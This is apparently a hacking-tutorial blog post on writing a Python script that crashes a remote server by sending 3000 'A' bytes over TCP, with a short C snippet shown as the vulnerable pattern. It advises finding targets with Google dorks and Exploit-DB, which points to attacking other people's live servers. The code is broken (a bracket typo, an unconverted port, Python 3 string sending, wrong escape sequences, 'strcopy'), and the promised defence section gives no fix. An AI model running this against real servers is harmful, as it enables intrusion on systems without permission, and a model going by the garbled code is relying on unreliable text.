Write A Remote Buffer Overflow Exploit Using Python.

Write A Remote Buffer Overflow Exploit Using Python

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon

Write A Remote Buffer Overflow Exploit Using Python

 

Write A Remote Buffer Overflow Exploit Using Python. Welcome back guys, today we will learn how to write a remote buffer overflow using Python programming language only with TCP.

What you actually need:

-Python 3.4(or above)

-A stable internet connection

-A vulnerable server

-Computer with Windows or Linux Operating System

If you don’t have Python installed on your computer you can download it from https://www.python.org/downloads/. The installation process is very easy and straight forward. Write A Remote Buffer Overflow Exploit Using Python.

Writing A Remote Buffer Overflow Exploit Using Python

1. Find a server for testing pourpose

This is a bit complicated part. Try to search for dorks at GHDB (https://www.exploit-db.com/google-hacking-database/). You can also try searching for for vulnerable software at Exploit-DB (https://www.exploit-db.com).

 

2. Coding

Coding is the fun part. Let us start by importing sys and socket, then, write the below code:

 

for carg in sys.argv:

            if carg == “-s”:

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        host = sys.argv[argnum]

            elif carg == “-p”:

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        port = sys.argv[argnum[

buffer = “\x41″* 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

s.send(“USV ” + buffer + “//r//n//r”)
s.close()

Write A Remote Buffer Overflow Exploit Using Python.

The code will look like this:

buffer_overflow_exp1

Now, lets see what the code actually does. We already know the argument indentification script.  The second line creates a buffer, which is \x41 multiplied 3000 times. Then we can see the lines of declaring the s as socket, then connecting with it, sending the required buffer and closing the socket. Looks pretty easy right.

Related  How To Spoof MAC Address Using Macchanger in Kali Linux

Once we are done with the above steps, lets check the output of our script!

ALSO READ  How to hack Any Android device with kali linux FatRat

buffer_overflow_exp2

As you can see, the script works fine and I have tested it a couple of times.

How to avoid Remote Buffer Overflow

The solution depends on your programming language for example, if you are using C language. Write A Remote Buffer Overflow Exploit Using Python.

int authed = 0;
char password_buffer[16];
strcopy(password_buffer, your_password)
if (strcmp(password_buffer, password) == 0) {
authed = 1;
}
else {
authed = 0;
}

 

So, once the your_password is over 16, you can implement auth overflow, or if there are even more, you can get buffer overflow with segmentation fault error.

There are various solutions for this problem. Write A Remote Buffer Overflow Exploit Using Python.

It's only fair to share...Digg thisShare on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInFlattr the authorShare on TumblrShare on VKShare on YummlyShare on RedditShare on StumbleUpon